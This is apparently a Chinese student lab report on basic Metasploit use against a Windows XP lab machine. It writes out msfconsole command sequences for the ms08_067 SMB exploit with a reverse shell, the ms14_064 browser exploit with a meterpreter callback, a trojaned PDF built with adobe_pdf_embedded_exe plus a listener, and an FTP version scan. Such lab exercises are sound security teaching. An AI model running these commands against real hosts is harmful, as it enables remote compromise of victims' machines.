Exp5 Msf基础应用 20164312 马孝涛

1.本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,如ms08_067; (1分)

1.2 一个针对浏览器的攻击,如ms11_050;(1分)

1.3 一个针对客户端的攻击,如Adobe;(1分)

1.4 成功应用任何一个辅助模块。(0.5分)唯一

2.实践内容
2.1一个主动攻击实践

在Linux上使用 msfconsole 并输入指令 use exploit/windows/smb/ms08_067_netapi ,然后输入指令 show payloads 和 show options 查看可以使用的payloads以及需要设置的参数。

Exp5 Msf基础应用 20164312 马孝涛

Exp5 Msf基础应用 20164312 马孝涛

输入指令:set payload generic/shell_reverse_tcp 

        set LHOST 192.168.49.132

     set LPORT 4312

        set RHOST 192.168.49.131 

     set target 0

tips:设置攻击机ip,攻击端口和靶机ip

Exp5 Msf基础应用 20164312 马孝涛

2.2 一个针对浏览器的攻击

使用指令 use exploit/windows/browser/ms14_064_ole_code_execution

选择payloads set payloads windows/meterpreter/reverse_http

Exp5 Msf基础应用 20164312 马孝涛

输入指令: set Lhost 192.168.49.132

      set Lport 4312

      set target 0

set uripath mxt4312

Exp5 Msf基础应用 20164312 马孝涛

在windows xp中打开ie并输入: http://192.168.49.132:8080/mxt4312

Exp5 Msf基础应用 20164312 马孝涛

显示回连成功:

Exp5 Msf基础应用 20164312 马孝涛

2.3 一个针对客户端的攻击

输入指令:    use exploit/windows/fileformat/adobe_pdf_embedded_exe

      set payload windows/meterpreter/reverse_tcp

      set filename 4312.pdf

      set lhost 192.168.49.132

      set lport 4312

      set target 0

Exp5 Msf基础应用 20164312 马孝涛

然后将文件发送到windows xp中,在kali中输入如下指令:

use exploit/multi/handler 

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.49.132

set lport 4312

Exp5 Msf基础应用 20164312 马孝涛

2.4 成功应用任何一个辅助模块 (唯一)

ftp 版本扫描:

输入指令:

use auxiliary/scanner/ftp/ftp_version

set RHOSTS 192.168.49.132

run

Exp5 Msf基础应用 20164312 马孝涛

3. 基础问题回答

(1)用自己的话解释什么是exploit,payload,encode?

exploit:渗透攻击,利用发现的漏洞对靶机进行攻击。

   payload:攻击载荷,渗透攻击成功后在系统中运行的模块,即通过渗透攻击把攻击载荷运至靶机中。

  Ecode:编码器,对代码进行异或、祛除坏字符及其他编码,保护攻击载荷不被发现。

(2)离实战还缺些什么技术或步骤?

  还差的很远,尝试过的模块只是九牛一毛,如果要实战还需要很多时间去研究其他模块。

4.实践总结与体会

这次实验并不困难,但是模块太多,第一次接触有点眼花缭乱,用search寻找了很多模块来使用,有些可以用有些用不了,也在这其中学到了很多知识,而且辅助模块里面有很多都很有意思。

上一篇:面试前赶紧看了5道Python Web面试题,Python面试题No17


下一篇:《剑指offer》面试题的Python实现